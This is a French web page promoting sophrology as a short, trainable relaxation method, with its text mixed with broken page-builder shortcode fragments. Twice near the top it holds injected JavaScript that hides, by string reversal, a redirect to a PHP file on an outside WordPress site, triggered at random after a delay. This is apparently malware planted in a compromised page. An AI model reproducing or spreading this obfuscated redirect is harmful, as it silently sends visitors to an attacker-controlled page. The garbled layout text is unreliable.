) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tom_1494594056541{padding-top: 6em !important;padding-bottom: 6em !important;} »]

 »Les

) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tom » line_height= »5″ line_color= »#92d64a » line_width= »40″ spacer_margin= »margin-bottom:20px; »]

C’est une technique parfaitement adaptée à notre culture. Les techniques sont, surtout au départ, brèves (10-15 min), donc intégrables à notre vie de tous les jours.

Réalisée de manière progressive, personnalisée et permissive, auprès d’un sophrologue, puis en toute autonomie. Cette méthode est basée sur des stratégies précises et simples. Le sophronisé n’est pas un patient, mais un être dynamique et entreprenant. Il apprend à participer et plus tard à conduire lui-même les différentes techniques. Ce qui l’aide à être mieux dans sa vie. De plus,à faire face aux événements rencontrés, à atteindre ses objectifs personnels et professionnels.

Les exercices statiques ou dynamiques, constitués de mouvements accessibles à tous, et d’activations mentales positives. Ces même exercices sont réalisés debout ou assis, exceptionnellement allongé, sans musique ni superflu.

Ils ne nécessitent pas de tenue particulière. Ils peuvent être pratiqués partout, à tout moment et surtout par tous (quels que soient votre âge, votre profil, vos convictions…). La méthode s’adapte aux capacités de la personne.

On admet facilement qu’il faut un entraînement régulier. Celui-ci est basé sur la répétition des mêmes gestes techniques, pour apprendre à marcher, jouer du piano, au tennis, remporter une médaille dans n’importe quelle discipline sportive, gagner aux échecs, mémoriser un discours ou un rôle au théâtre. On imagine volontiers que le bonheur doit nous tomber du ciel, ou tout au moins qu’il dépend de circonstances extérieures (fortune, promotion, relations…) sans aucun apprentissage ni effort de transformation intérieure. Pour le neuropsychiatre Alfonso Caycedo, comme pour les sages des traditions orientales qu’il a rencontrés, le bonheur est avant tout une aptitude intérieure, et une affaire d’entraînement.